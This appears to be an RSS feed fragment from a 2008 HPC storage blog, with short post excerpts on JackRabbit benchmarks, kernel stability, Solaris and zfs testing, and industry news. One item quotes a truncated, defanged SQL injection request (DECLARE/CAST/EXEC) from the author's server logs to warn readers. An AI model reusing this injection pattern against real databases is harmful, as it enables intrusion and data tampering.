      <description>Firefox 3 makes great hay over how much happier they are for their security bits. Especially their seemingly deeply thought out position on not allowing self signed certificates to be used easily on the web. Kudos to them for their stance. One &amp;hellip; well &amp;hellip; not so small &amp;hellip; problem. It breaks things. No, I am not arguing whether or not self-signed is good or bad. It breaks things you can&amp;rsquo;t possibly fix.</description>
    </item>
    
    <item>
      <title>The time implications of storage size</title>
      <link>https://blog.scalability.org/2008/09/the-time-implications-of-storage-size/</link>
      <pubDate>Wed, 10 Sep 2008 01:14:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/the-time-implications-of-storage-size/</guid>
      <description>I&amp;rsquo;ve been writing and talking about data motion as a pain point for a while. To drive this home, have a look at this site. This provides a snapshot into how much bandwidth a technology provides, and what the implications are for (best case) data motion over time. Since data motion isn&amp;rsquo;t getting any easier, a few thoughts emerge from this.
First, as we gather ever more data, this data is going to reside at static locations &amp;hellip; the cost of moving it is large over the network.</description>
    </item>
    
    <item>
      <title>updated bonnie&#43;&#43; for JackRabbit-M</title>
      <link>https://blog.scalability.org/2008/09/updated-bonnie-for-jackrabbit-m/</link>
      <pubDate>Mon, 08 Sep 2008 04:13:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/updated-bonnie-for-jackrabbit-m/</guid>
      <description>[root@jackrabbitm sbin]# bonnie++ -u root -d /big -f
Using uid:0, gid:0.
Writing intelligently...done
Rewriting...done
Reading intelligently...done
start &#39;em...done...done...done...
Create files in sequential order...done.
Stat files in sequential order...done.
Delete files in sequential order...done.
Create files in random order...done.
Stat files in random order...done.
Delete files in random order...done.
Version 1.03 ------Sequential Output------ --Sequential Input- --Random-
-Per Chr- --Block-- -Rewrite- -Per Chr- --Block-- --Seeks--
Machine Size K/sec %CP K/sec %CP K/sec %CP K/sec %CP K/sec %CP /sec %CP
jackrabbitm 129112M 707695 51 153242 17 1143371 73 452.</description>
    </item>
    
    <item>
      <title>Observations on kernel stability</title>
      <link>https://blog.scalability.org/2008/09/observations-on-kernel-stability/</link>
      <pubDate>Sat, 06 Sep 2008 15:50:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/observations-on-kernel-stability/</guid>
      <description>There is just no nice way to say this. We have a real (serious) concern over the stability of the baseline Redhat/SuSE kernels on newer hardware. Not just our JackRabbit systems (and our forthcoming ΔV systems), but clusters of newer gear, newer servers, etc. We install baseline systems, using nothing but the baseline components, perform the recommended upgrades. Place these systems under moderate load, and whammo &amp;hellip; kernel panic. Replace their kernel with our 2.</description>
    </item>
    
    <item>
      <title>Evolution of sales models in a changing economy</title>
      <link>https://blog.scalability.org/2008/09/evolution-of-sales-models-in-a-changing-economy/</link>
      <pubDate>Sat, 06 Sep 2008 13:26:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/evolution-of-sales-models-in-a-changing-economy/</guid>
      <description>Short note. For many years, large computing companies have fielded large sales forces, and large reseller forces to provide more sales firepower to their revenue generation efforts. These require personal interaction to buy something. Sun has recently decided to go almost all reseller. Feedback from some of our mutual customers indicates that some customers don&amp;rsquo;t like this. The flip side is that large sales forces require large expenditures of capital &amp;hellip; people cost money to hire.</description>
    </item>
    
    <item>
      <title>why do I bang my head against this wall?</title>
      <link>https://blog.scalability.org/2008/09/why-do-i-bang-my-head-against-this-wall/</link>
      <pubDate>Thu, 04 Sep 2008 16:40:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/why-do-i-bang-my-head-against-this-wall/</guid>
      <description>&amp;hellip; because it feels so good when I stop. Or so goes the old joke. A long while ago, I mentioned we have a customer who self-inflicts pain by spending too much time using root for day to day work. We advise against this. No good can possibly come of this, only bad. Like the last time when a key-logger grabbed the root password as some windows user was typing it in.</description>
    </item>
    
    <item>
      <title>Blue waters are a-movin...</title>
      <link>https://blog.scalability.org/2008/09/blue-waters-are-a-movin/</link>
      <pubDate>Wed, 03 Sep 2008 22:39:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/blue-waters-are-a-movin/</guid>
      <description>NSF is funding a 2x10^5 processor monster machine at NCSA. At $208M, each dollar will buy you 4.8 MFLOP (4.8x10^6 FLOP). Hmmm&amp;hellip;. Assuming a quad core CPU would be able to provide (in theory) 32 GFLOP (4 cores x 8 GFLOP/core), you would need 31,250 units to provide this &amp;hellip; (125000 cores). There are some interesting things about this machine. Very interesting &amp;hellip; not just the price tag or the estimated sustainable performance</description>
    </item>
    
    <item>
      <title>[sigh ....]</title>
      <link>https://blog.scalability.org/2008/09/sigh/</link>
      <pubDate>Wed, 03 Sep 2008 19:53:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/sigh/</guid>
      <description>New unit being built for another customer [JackRabbit orders are multiplying like bunnies]
[root@jackrabbitm ~]# dd if=/big/big.file of=/dev/null ...
10000+0 records in
10000+0 records out
83886080000 bytes (84 GB) copied, 51.8149 seconds, 1.6 GB/s
[root@jackrabbitm ~]# cat /proc/meminfo | grep MemTotal
MemTotal: 33011556 kB
Yes. We did just stream a file more than 2x the size of ram (32 GB) from disk. Yes, it sustained 1.62 GB/s. Yes. We did this with 24 disks.</description>
    </item>
    
    <item>
      <title>Interesting observations on performance focus</title>
      <link>https://blog.scalability.org/2008/09/interesting-observations-on-performance-focus/</link>
      <pubDate>Tue, 02 Sep 2008 03:27:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/interesting-observations-on-performance-focus/</guid>
      <description>Again, on the excellent InsideHPC.com blog, John West points to a blog at Intel with an interesting observation:
I would add to this that we have research computer users who prefer the expressiveness of languages such as Matlab, often ignoring the huge performance penalty for using such languages. The value to them is the ease of writing/maintaining their &amp;ldquo;code&amp;rdquo;. Tools such as ISC&amp;rsquo;s StarP attempt to build compiled code from the Matlab code.</description>
    </item>
    
    <item>
      <title>humongous computing systems</title>
      <link>https://blog.scalability.org/2008/09/humongous-computing-systems/</link>
      <pubDate>Tue, 02 Sep 2008 01:43:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/humongous-computing-systems/</guid>
      <description>Again, John West reads more than I do, and notes at the InsideHPC.com blog an article from Doug Eadline in Linux Magazine, all about really big clusters. These are subjects I have explored a number of times. Doug points to nature and how nature scales and isolates failure.
This also reminds me of the multiple types of networks that can be formed for computation/processing. One that I deal with every now and then are the spammers, and their bot-nets.</description>
    </item>
    
    <item>
      <title>InsideHPC on SGI results, and thoughts on industry trends</title>
      <link>https://blog.scalability.org/2008/09/insidehpc-on-sgi-results-and-thoughts-on-industry-trends/</link>
      <pubDate>Tue, 02 Sep 2008 01:03:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/insidehpc-on-sgi-results-and-thoughts-on-industry-trends/</guid>
      <description>John West at the excellent InsideHPC.com blog points out in a short note that
A number of obvious points about this &amp;hellip; the economy has been under pressure. Customers have been buying less. SGI reports that revenue has increased to $93.9M from $79.1M in the third quarter. How much of this is normal seasonal variance (government purchase cycles) versus an actual increase in bookings (e.g. new deals that haven&amp;rsquo;t been worked on for a while).</description>
    </item>
    
    <item>
      <title>echos ...</title>
      <link>https://blog.scalability.org/2008/09/echos/</link>
      <pubDate>Mon, 01 Sep 2008 22:52:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/echos/</guid>
      <description>I don&amp;rsquo;t mind tearing into bad implementations of an idea or product. If the thing isn&amp;rsquo;t good, criticism can help focus where it needs to improve. The trouble with this is when the criticism arrives too late, or is rejected out of hand by those who would benefit most. No, not being self righteous. I am just as critical of our stuff, our products and mis-steps as I am of others.</description>
    </item>
    
    <item>
      <title>Sadness ... but understandable</title>
      <link>https://blog.scalability.org/2008/08/sadness-but-understandable/</link>
      <pubDate>Thu, 28 Aug 2008 22:28:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/sadness-but-understandable/</guid>
      <description>[Slashdot](http://slashdot.org) reports on a Wired story which covers the demise of fundamental physics research at Bell Labs. For those who aren&amp;rsquo;t aware, your ability to read this on your electronic device is a direct result of fundamental physics research at Bell Labs. The vast majority of computers these days are based upon the transistor. Which was invented at Bell Labs. Yeah, you might say &amp;ldquo;so what&amp;rdquo;. Curiosity driven research can sometimes pay back in a big way.</description>
    </item>
    
    <item>
      <title>banging my head against ... grub .... grrrr</title>
      <link>https://blog.scalability.org/2008/08/banging-my-head-against-grub-grrrr/</link>
      <pubDate>Tue, 26 Aug 2008 02:29:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/banging-my-head-against-grub-grrrr/</guid>
      <description>So we had loaded two pretty darn nearly identical JackRabbits for delivery to a customer tomorrow. As part of the load, we want serial consoles available in case we need emergency access. Plug it in and solve problems. Great. Remember, these are virtually identical machines. Same MB, same CPU, same rev (one has more cores/twice the memory of the other used for disk to disk backups). Same bios, same bios settings.</description>
    </item>
    
    <item>
      <title>Fun monday morning benchmarking</title>
      <link>https://blog.scalability.org/2008/08/fun-monday-morning-benchmarking/</link>
      <pubDate>Mon, 25 Aug 2008 11:50:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/fun-monday-morning-benchmarking/</guid>
      <description>Running NCBI BLAST on the JackRabbit we are preparing for shipment. Used the nt database from last July (21 GB in size, 5+M sequences). Our A. thaliana query had 1164 sequences, and about 500k letters. Took 8m 44s to BLAST these sequences against this database. This means about 2.1838e+13 cell updates per second. This is the product of the number of letters in the database and the sequence under test divided by the total wall clock time.</description>
    </item>
    
    <item>
      <title>while we are at it ...</title>
      <link>https://blog.scalability.org/2008/08/while-we-are-at-it/</link>
      <pubDate>Sun, 24 Aug 2008 17:04:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/while-we-are-at-it/</guid>
      <description>a new short benchmark writeup for JackRabbit for On-Demand Media Service. Quite cool. Our results were amazing.</description>
    </item>
    
    <item>
      <title>Its up! [our online store]</title>
      <link>https://blog.scalability.org/2008/08/its-up-our-online-store/</link>
      <pubDate>Sun, 24 Aug 2008 15:31:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/its-up-our-online-store/</guid>
      <description>Took us long enough&amp;hellip; Now you can buy your JackRabbit high performance storage systems online. Just click here &amp;hellip; Not everything is on the store, but we are moving to get the items up quickly. Nothing quite like buying Gigabytes/s while wearing bunny slippers ...</description>
    </item>
    
    <item>
      <title>Our customers are not crash dummies ...</title>
      <link>https://blog.scalability.org/2008/08/our-customers-are-not-crash-dummies/</link>
      <pubDate>Sun, 24 Aug 2008 11:54:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/our-customers-are-not-crash-dummies/</guid>
      <description>&amp;hellip; and we don&amp;rsquo;t treat them like such. This is the gist of a conversation we had over the weekend. A JackRabbit unit running Centos 5.2 going out to a customer in the financial services space, required firmware updates for some of its components. It would have been simply too easy for us to do what many of our competitors do, and ship them a firmware/driver update on a CD or USB stick, or point them to a login for downloading the bits.</description>
    </item>
    
    <item>
      <title>multiple job opportunities</title>
      <link>https://blog.scalability.org/2008/08/multiple-job-opportunities/</link>
      <pubDate>Sat, 23 Aug 2008 12:18:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/multiple-job-opportunities/</guid>
      <description>OT to our usual fare. The day job has a few possible openings for high performance computing technical types. Positions would be in Michigan, and one would have some extended travel. Please contact me if you would like to talk.</description>
    </item>
    
    <item>
      <title>An interesting correlation</title>
      <link>https://blog.scalability.org/2008/08/an-interesting-correlation/</link>
      <pubDate>Wed, 20 Aug 2008 15:50:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/an-interesting-correlation/</guid>
      <description>Whenever a post somehow critical of zfs or Sun shows up on the blog or in an email to a list, within a few hours, someone starts email-bombing us. Hmmmm&amp;hellip;&amp;hellip;&amp;hellip;. Correlations do not imply causality. But they are damn suspicious. Update: I should also note that someone took the time to even try to subscribe me to several mailing lists. Wow. The value of this is &amp;hellip;. what?</description>
    </item>
    
    <item>
      <title>apologies for slow posting ... we have been busy</title>
      <link>https://blog.scalability.org/2008/08/apologies-for-slow-posting-we-have-been-busy/</link>
      <pubDate>Tue, 19 Aug 2008 12:16:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/apologies-for-slow-posting-we-have-been-busy/</guid>
      <description>many things going on &amp;hellip; busiest JackRabbit month on record. We moved into a new facility, migrated servers, setup a new phone system, setup a new lab, started the online store (still not complete, but ready to take initial orders!), &amp;hellip; yadda yadda yadda. I won&amp;rsquo;t say JackRabbits are flying off shelves &amp;hellip; though I could say they are hopping off them (JackRabbits don&amp;rsquo;t have wings after all).</description>
    </item>
    
    <item>
      <title>Rackable buys TerraScale and now dumps TerraScale</title>
      <link>https://blog.scalability.org/2008/08/rackable-buys-terrascale-and-now-dumps-terrascale/</link>
      <pubDate>Tue, 19 Aug 2008 01:00:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/rackable-buys-terrascale-and-now-dumps-terrascale/</guid>
      <description>TerraScale were an innovative bunch that developed some interesting technologies around the xfs file system, and made it scale in a cluster. Some time ago, Rackable bought them. Now it appears that Rackable is pulling back from this market, and is putting TerraScale &amp;hellip; er &amp;hellip; RapidScale on the auction block. Ok, it&amp;rsquo;s not quite like this &amp;hellip; they have engaged a financial advisor to &amp;ldquo;seek strategic alternatives&amp;rdquo; for the group.</description>
    </item>
    
    <item>
      <title>JackRabbit-M bonnie&#43;&#43; results</title>
      <link>https://blog.scalability.org/2008/08/jackrabbit-m-bonnie-results/</link>
      <pubDate>Mon, 18 Aug 2008 16:45:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/jackrabbit-m-bonnie-results/</guid>
      <description>JackRabbit-M run of bonnie++ 1.0.3 no patches, run in the usual way. bonnie++ -u root -d /big -f
nets these measurements:
bonnie++ -u root -d /big -f
Using uid:0, gid:0.
Writing intelligently...done
Rewriting...done
Reading intelligently...done
start &#39;em...done...done...done...
Create files in sequential order...done.
Stat files in sequential order...done.
Delete files in sequential order...done.
Create files in random order...done.
Stat files in random order...done.
Delete files in random order...done.
Version 1.03 ------Sequential Output------ --Sequential Input- --Random-
-Per Chr- --Block-- -Rewrite- -Per Chr- --Block-- --Seeks--
Machine Size K/sec %CP K/sec %CP K/sec %CP K/sec %CP K/sec %CP /sec %CP
jackrabbit 129104M 668525 43 166778 18 1071018 66 426.</description>
    </item>
    
    <item>
      <title>JackRabbit-M update</title>
      <link>https://blog.scalability.org/2008/08/jackrabbit-m-update/</link>
      <pubDate>Sat, 16 Aug 2008 14:50:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/jackrabbit-m-update/</guid>
      <description>JackRabbit-M [you will be able to order these online in short order from our store]. More tests, more burn in. I will describe this unit in a moment. We are taking this one out to the test track. Running a few time trials. Cracking the throttle. Wide open.
[cue Don Felder&amp;rsquo;s &amp;ldquo;Heavy Metal&amp;rdquo;: this unit masses north of 60 kg &amp;hellip; ] raw write speed:
[root@jackrabbit ~]# dd if=/dev/zero of=/big/big.file .</description>
    </item>
    
    <item>
      <title>On being a 2 x 4 (on being a two by four)</title>
      <link>https://blog.scalability.org/2008/08/on-being-a-2-x-4-on-being-a-two-by-four/</link>
      <pubDate>Sat, 16 Aug 2008 00:55:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/on-being-a-2-x-4-on-being-a-two-by-four/</guid>
      <description>For those not familiar with this vernacular, a 2x4 (two by four) is a bit of wood, 2 inches by 4 inches in cross-section. It is sometimes brandished as a defensive or offensive weapon. You use a 2x4 to beat someone into submission &amp;hellip; or, more correctly, a metaphorical 2x4 &amp;hellip; lest you wind up on the wrong side of the law. This post is about the actualization of the metaphor.</description>
    </item>
    
    <item>
      <title>that was boring .... wordpress 2.6.1 upgrade</title>
      <link>https://blog.scalability.org/2008/08/that-was-boring-wordpress-261-upgrade/</link>
      <pubDate>Fri, 15 Aug 2008 23:26:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/that-was-boring-wordpress-261-upgrade/</guid>
      <description>No &amp;hellip; really boring. Click click click &amp;hellip;. (iterate N times) click. You are done. Whatever happened to those fun moments of abject terror when you realized you just blew away an important DB table &amp;hellip; Good job WP folk.</description>
    </item>
    
    <item>
      <title>this is so ... so ... very ... wrong ... (ROTFLMAO)</title>
      <link>https://blog.scalability.org/2008/08/this-is-so-so-very-wrong-rotflmao/</link>
      <pubDate>Tue, 12 Aug 2008 11:32:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/this-is-so-so-very-wrong-rotflmao/</guid>
      <description></description>
    </item>
    
    <item>
      <title>Bandwidth woes, hopefully a thing of the past</title>
      <link>https://blog.scalability.org/2008/08/bandwidth-woes-hopefully-a-thing-of-the-past/</link>
      <pubDate>Wed, 06 Aug 2008 04:18:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/bandwidth-woes-hopefully-a-thing-of-the-past/</guid>
      <description>In moving to our new facilities, we changed from an 11 Mb/1.5 Mb line to a 6 Mb/0.8 Mb line. This was due to the availability of service to that area. Yeah, we could do a 1.5 Mb/1.5 Mb T1 line, but this is slow compared to what we had, and our experience with SLAs suggests that they aren&amp;rsquo;t honored as we might like. So we installed the 6 Mb line.</description>
    </item>
    
    <item>
      <title>of all the amateur ... dumb ... silly errors I have ever seen, this one tops them</title>
      <link>https://blog.scalability.org/2008/08/of-all-the-amateur-dumb-silly-errors-i-have-ever-seen-this-one-tops-them/</link>
      <pubDate>Wed, 06 Aug 2008 00:55:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/of-all-the-amateur-dumb-silly-errors-i-have-ever-seen-this-one-tops-them/</guid>
      <description>&amp;hellip; and of course, I made it. And then went on vacation. No I am not kidding. Yes, I tested it. No, not the way I should have&amp;hellip;
Yeah, after our move, I redirected www.scalableinformatics.com to our new site. Yessirree. I really checked it out. Carefully. Wouldn&amp;rsquo;t want to make an error. Like directing it to the wrong machine. Nosirree. Wouldn&amp;rsquo;t want to do that. Too bad. That&amp;rsquo;s what I did.</description>
    </item>
    
    <item>
      <title>you may have noticed the sparse posting ...</title>
      <link>https://blog.scalability.org/2008/08/you-may-have-noticed-the-sparse-posting/</link>
      <pubDate>Fri, 01 Aug 2008 14:06:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/08/you-may-have-noticed-the-sparse-posting/</guid>
      <description>&amp;hellip; no, I haven&amp;rsquo;t left the building. Been on vacation this past week in lovely northern Michigan. In Mackinac to be precise. Going to St. Ignace and the Soo Locks today (Sault Ste. Marie). Should be fun. Weather is lovely, had some great morning pictures of the sunrise over the waters on the north shore of the US &amp;hellip; Back next week &amp;hellip;</description>
    </item>
    
    <item>
      <title>Not official yet, but ...</title>
      <link>https://blog.scalability.org/2008/07/not-official-yet-but/</link>
      <pubDate>Sat, 26 Jul 2008 14:37:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/not-official-yet-but/</guid>
      <description>&amp;hellip; day job just joined Automation Alley. Will put an official announcement up soon. Once this goes live, the day job will be offering discounted JackRabbit and HPC systems/consulting to other members. Part of this comes from a desire to grow our business in Michigan, part comes from an understanding of the Michigan economic realities. If you haven&amp;rsquo;t heard about the state of the economy in Michigan, there is simply no way to sugar coat it.</description>
    </item>
    
    <item>
      <title>deja vu</title>
      <link>https://blog.scalability.org/2008/07/deja-vu/</link>
      <pubDate>Fri, 25 Jul 2008 03:17:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/deja-vu/</guid>
      <description>Posted without comment.</description>
    </item>
    
    <item>
      <title>ok ... more (similar) attacks</title>
      <link>https://blog.scalability.org/2008/07/ok-more-similar-attacks/</link>
      <pubDate>Wed, 23 Jul 2008 22:17:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/ok-more-similar-attacks/</guid>
      <description>Check your logs folks, someone is trying to crack into your systems. More &amp;hellip; interesting &amp;hellip; logs.</description>
    </item>
    
    <item>
      <title>A new attack in the wild, and in my logs</title>
      <link>https://blog.scalability.org/2008/07/a-new-attack-in-the-wild-and-in-my-logs/</link>
      <pubDate>Wed, 23 Jul 2008 21:59:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/a-new-attack-in-the-wild-and-in-my-logs/</guid>
      <description>Have a look at this (safe, defanged) From a request:
?%27;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F4375 .... 655F437572736F72%20AS%20CHAR(4000));EXEC(@S); Neat&amp;hellip; huh? Direct injection attack. Removed most of the payload. Didn&amp;rsquo;t succeed. Came from Malaysia:
60.48.212.49 [W| B | U ] |MYS , Johor Bahru | 23-Jul 12:30:41 /?&#39;;DECLARE%2... 0));EXEC(@S); - 60.48.212.49 [W| B | U ] |MYS , Johor Bahru | 23-Jul 12:30:41 /?;DECLARE%20... 0));EXEC(@S); -  And Brooklyn
24.184.25.236 [W| B | U ] |USA , Brooklyn | 23-Jul 12:04:02 /?</description>
    </item>
    
    <item>
      <title>557 days ... and then I (accidentally) yank the power plug</title>
      <link>https://blog.scalability.org/2008/07/557-days-and-then-i-accidentally-yank-the-power-plug/</link>
      <pubDate>Tue, 22 Jul 2008 02:29:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/557-days-and-then-i-accidentally-yank-the-power-plug/</guid>
      <description>We are prepping for the move to the new facility. Nicer digs, and we are moving some infrastructure over. Our main internal server has been (until about 11pm this evening) up for 557 days. Continuously, no down time. Planned or unplanned. Of course, all this means is that, as time goes on, some klutz is gonna do something silly.
Well, I&amp;rsquo;m the klutz. While pulling a power plug out of the PDU, I didn&amp;rsquo;t notice I had dislodged the adjacent plug.</description>
    </item>
    
    <item>
      <title>Taking a JackRabbit-M for a spin</title>
      <link>https://blog.scalability.org/2008/07/taking-a-jackrabbit-m-for-a-spin/</link>
      <pubDate>Sun, 20 Jul 2008 01:19:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/taking-a-jackrabbit-m-for-a-spin/</guid>
      <description>This is a new 24TB raw JackRabbit-M system we are burning in for a customer. Unit will ship in short order, but I thought you might like to see what happens when we take it for a spin. And when we crack the throttle.
First the basics: 24x 1TB drives (SATA II nearline drives, not desktop units), 4U case. 2 hot spares, RAID6 (yes, these numbers are with RAID6). System has 16 GB RAM.</description>
    </item>
    
    <item>
      <title>Yow!</title>
      <link>https://blog.scalability.org/2008/07/yow/</link>
      <pubDate>Tue, 15 Jul 2008 14:42:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/yow/</guid>
      <description>Expected lifetime of this windows system on the internet (e.g. how long until a hacker pwnz it? Or, put another way, how long until you lose control of it)? 4 minutes.</description>
    </item>
    
    <item>
      <title>OFED (partially building) on Fedora Core 9</title>
      <link>https://blog.scalability.org/2008/07/ofed-partially-building-on-fedora-core-9/</link>
      <pubDate>Sun, 13 Jul 2008 16:32:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/ofed-partially-building-on-fedora-core-9/</guid>
      <description>This was fun. Well, ok, it wasn&amp;rsquo;t. But it works now. The ofa_kernel rpm crashes and burns being rebuilt on FC9. As do sdp, rds, ibutils, and dapl. Fine. Also have to downgrade tcl to 8.4 from 8.5. Because the RPMs hard-link to a specific library in tk (which depends upon tcl). Again, fine.
Run the install.pl script. Select install. Select customize. Select everything but those things. Go get coffee. Note that the conversion to gcc 4.</description>
    </item>
    
    <item>
      <title>Horribly convoluted Linux kernel build processes (for a distribution)</title>
      <link>https://blog.scalability.org/2008/07/horribly-convoluted-linux-kernel-build-processes-for-a-distribution/</link>
      <pubDate>Sat, 12 Jul 2008 15:52:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/horribly-convoluted-linux-kernel-build-processes-for-a-distribution/</guid>
      <description>Suppose you want to build a new kernel RPM that incorporates a different kernel (slightly up or down from distribution baseline). You want to turn off all their patches, and simply build the kernel, the headers, the -devel, &amp;hellip; Can you do it? No I am serious&amp;hellip; can you do it? The following is a bit of a rant. Borne out of frustration with things that are designed broken (IMO).</description>
    </item>
    
    <item>
      <title>Imitation is the sincerest form of flattery</title>
      <link>https://blog.scalability.org/2008/07/imitation-is-the-sincerest-form-of-flattery/</link>
      <pubDate>Fri, 11 Jul 2008 04:12:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/imitation-is-the-sincerest-form-of-flattery/</guid>
      <description>In reviewing a new rev of some product that competes with our JackRabbit unit, I noted that the new rev actually copies a number of the good ideas we have been using in our JackRabbits for quite a while. I am impressed :) I guess if you can&amp;rsquo;t beat em, join em.</description>
    </item>
    
    <item>
      <title>A 72 TB JackRabbit ...</title>
      <link>https://blog.scalability.org/2008/07/a-72-tb-jackrabbit/</link>
      <pubDate>Fri, 11 Jul 2008 00:30:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/a-72-tb-jackrabbit/</guid>
      <description>Seagate just announced a 1.5 TB desktop drive, with the enterprise unit sure to follow. Delivery of desktop drives should be in August. If we used 48 of these in our 5U JackRabbit unit, we would be able to provide 72 TB raw. A rack full (8) would hit 576 TB raw, or nearly 0.6 PB/rack. FWIW: we have customers who have requested the desktop drive variants. We see failure rates about the same as the enterprise/NL units.</description>
    </item>
    
    <item>
      <title>Windows 200x impressions after using it for testing</title>
      <link>https://blog.scalability.org/2008/07/windows-200x-impressions-after-using-it-for-testing/</link>
      <pubDate>Mon, 07 Jul 2008 14:15:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/windows-200x-impressions-after-using-it-for-testing/</guid>
      <description>We are in the midst of Solaris 10 testing for a customer. Explaining why Linux is so much faster (and more stable) on the hardware is getting old. So I&amp;rsquo;ll take a break and talk about the windows 200x experiences we had recently. A customer wanted to see performance on a number of things running on Windows 2003. They had a particular application that runs on it, and wanted to see what we could do with JackRabbit.</description>
    </item>
    
    <item>
      <title>Waiting for SCAT on x86/x64</title>
      <link>https://blog.scalability.org/2008/07/waiting-for-scat-on-x86x64/</link>
      <pubDate>Mon, 07 Jul 2008 02:08:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/waiting-for-scat-on-x86x64/</guid>
      <description>Another Solaris crash running bonnie++ during testing. I am convinced it is a driver issue, but before I go speaking to the people writing the driver, I want a good convincing stack trace to hand them (and a core file). I found the core files (shades of Irix past, I like the fact that I get them). Looked for SCAT (Solaris Crash Analysis Tool). 4.1 is out, for Sparc only. 5.</description>
    </item>
    
    <item>
      <title>zfs un-benchmarking</title>
      <link>https://blog.scalability.org/2008/07/zfs-un-benchmarking/</link>
      <pubDate>Sun, 06 Jul 2008 16:39:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/zfs-un-benchmarking/</guid>
      <description>So we have Solaris 10 installed on a JackRabbit-M. According to Sun&amp;rsquo;s license, as I learned last night, we cannot report benchmark results without permission from Sun. Sad, but this is how they wish to govern information flow around their product. Our rationale for testing was to finally get some numbers that we can provide to users/customers about real zfs performance. There is a huge amount of (largely uncontested) information (emanating mainly from Sun and its agents) that zfs is a very fast file system.</description>
    </item>
    
    <item>
      <title>Is this a zfs bug or an IOzone bug?</title>
      <link>https://blog.scalability.org/2008/07/is-this-a-zfs-bug-or-an-iozone-bug/</link>
      <pubDate>Wed, 02 Jul 2008 23:01:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/is-this-a-zfs-bug-or-an-iozone-bug/</guid>
      <description>Hmmmmmmmmmm &amp;hellip;.
# /opt/csw/bin/iozone -Ra -n 16m -g 16g -y 16m -m -b sol10-jrm-large.xls Iozone: Performance Test of File I/O Version $Revision: 3.217 $ Compiled for 32 bit mode. Build: Solaris Contributors:William Norcott, Don Capps, Isom Crawford, Kirby Collins Al Slater, Scott Rhine, Mike Wisner, Ken Goss Steve Landherr, Brad Smith, Mark Kelly, Dr. Alain CYR, Randy Dunlap, Mark Montague, Dan Million, Jean-Marc Zucconi, Jeff Blomberg, Erik Habbinga, Kris Strecker. Run began: Wed Jul 2 18:47:07 2008 Excel chart generation enabled Auto Mode Using minimum file size of 16384 kilobytes.</description>
    </item>
    
    <item>
      <title>Solaris 10 5/08 and zfs on JackRabbit</title>
      <link>https://blog.scalability.org/2008/07/solaris-10-508-and-zfs-on-jackrabbit/</link>
      <pubDate>Wed, 02 Jul 2008 20:42:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/solaris-10-508-and-zfs-on-jackrabbit/</guid>
      <description>Yeah, it works.
# df -h Filesystem size used avail capacity Mounted on /dev/dsk/c0d0s0 7.9G 3.3G 4.5G 43% / /devices 0K 0K 0K 0% /devices ctfs 0K 0K 0K 0% /system/contract proc 0K 0K 0K 0% /proc mnttab 0K 0K 0K 0% /etc/mnttab swap 15G 896K 15G 1% /etc/svc/volatile objfs 0K 0K 0K 0% /system/object /usr/lib/libc/libc_hwcap1.so.1 7.9G 3.3G 4.5G 43% /lib/libc.so.1 fd 0K 0K 0K 0% /dev/fd swap 15G 112K 15G 1% /tmp swap 15G 32K 15G 1% /var/run /dev/dsk/c0d0s3 3.</description>
    </item>
    
    <item>
      <title>tracking other companies</title>
      <link>https://blog.scalability.org/2008/07/tracking-other-companies/</link>
      <pubDate>Wed, 02 Jul 2008 06:49:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/07/tracking-other-companies/</guid>
      <description>SGI and Clearspeed. SGI is now down to $4.90/share at its close. It dropped 11% yesterday. Market cap is $57M. Yow. Yeah, the market has been volatile. I am not sure that explains this. With 1600 employees, this is a value of $36k/person. They are rapidly getting to a place where their valuation and ours becomes comparable.
They are getting wins, but maybe the wins are not as profitable as they need &amp;hellip; or maybe the ones we hear about are the only ones rather than a representative set.</description>
    </item>
    
    <item>
